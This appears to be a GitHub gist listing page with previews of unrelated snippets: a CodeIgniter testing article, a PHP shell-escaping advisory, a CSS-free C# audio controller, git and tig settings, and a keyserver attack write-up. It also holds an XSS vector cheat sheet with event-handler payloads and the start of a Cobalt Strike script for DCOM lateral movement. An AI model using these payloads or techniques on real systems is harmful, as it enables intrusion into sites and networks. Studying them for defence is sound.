Skip to content

Instantly share code, notes, and snippets.

Avatar
🇨🇦
Use AGPL

Sean AlbinoDrought

🇨🇦
Use AGPL
View GitHub Profile
@samkeen
samkeen / TestingCodeigniter.md
Created Aug 12, 2011
Article describing how to test Codeigniter apps
View TestingCodeigniter.md

(Integration) Test Infecting Codeigniter

Intro

This is not an article on the theoretical proper way to implement a testing policy and/or infrastructure. This is much more real world than that. This is about finding yourself in a situation were you need to refactor or add features to an existing substantial code base. Before undertaking such an adventure you would like to lay down some tests for regression purposes. The hitch is that the code is in a framework that hasn't put testing support first.

Many PHP frameworks qualify for the statement above but the one we will talk about in this article is Codeigniter. I wont use this article to debate the quality of the Codeigniter code base. It is what it is and finds itself used for a very many (in production) websites. What this article is about is addressing the situation that there are many developers out there that may find themselves working on a product utilizing a framework such as Codeigniter

@Zenexer
Zenexer / escapeshellrce.md
Last active Mar 15, 2021
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
View escapeshellrce.md

Paul Buonopane paul@namepros.com at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

@rsmudge
rsmudge / comexec.cna
Created Jan 6, 2017
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
View comexec.cna
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View AudioManager.cs
using System;
using System.Runtime.InteropServices;
// ReSharper disable SuspiciousTypeConversion.Global
// ReSharper disable InconsistentNaming
namespace AudioController
{
/// <summary>
/// Controls audio using the Windows CoreAudio API
/// from: http://stackoverflow.com/questions/14306048/controling-volume-mixer
@kurobeats
kurobeats / xss_vectors.txt
Last active Aug 11, 2022
XSS Vectors Cheat Sheet
View xss_vectors.txt
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@AlbinoDrought
AlbinoDrought / .tigrc
Last active Oct 9, 2018
My basic af .tigrc
View .tigrc
# Press ctrl+a to amend the last commit with whatever is staged
bind status <Ctrl-A> !git commit --amend
# Press shift+p to push
# requires `git config --global push.default current`
bind status P !git push -u
@AlbinoDrought
AlbinoDrought / creamy-things-to-make.md
Last active Mar 22, 2022
Creamy Things To Make ™️
View creamy-things-to-make.md

Creamy Things

  • SkipTheDishes tracker (No longer used)
  • 🎊 Some ghetto NextCloud clone that I feel safe selfhosting (probably read only) (video version here, working and in use) (file version WIP)
  • yet another IRC client for the 21st century
  • selfhosted screensharing thing (like rabb.it, but not) alternative exists: https://github.com/m1k1o/neko
  • a modern browser that isn't rounded
  • some way to import normal cams to unify Unifi Video is losing support, moving to something like Shinobi instead (ctrl-f NVR)
  • foss modern feedback tracker thing (can io)
  • visual dice rolling bot to make hard life choices for me
@rjhansen
rjhansen / keyservers.md
Last active Aug 11, 2022
SKS Keyserver Network Under Attack
View keyservers.md

SKS Keyserver Network Under Attack

This work is released under a Creative Commons Attribution-NoDerivatives 4.0 International License.

Terminological Note

"OpenPGP" refers to the OpenPGP protocol, in much the same way that HTML refers to the protocol that specifies how to write a web page. "GnuPG", "SequoiaPGP", "OpenPGP.js", and others are implementations of the OpenPGP protocol in the same way that Mozilla Firefox, Google Chromium, and Microsoft Edge refer to software packages that process HTML data.

Who am I?

View basic-tcp-chat.zig
const std = @import("std");
const net = std.net;
const fs = std.fs;
const os = std.os;
pub const io_mode = .evented;
pub fn main() anyerror!void {
var general_purpose_allocator = std.heap.GeneralPurposeAllocator(.{}){};
const allocator = &general_purpose_allocator.allocator;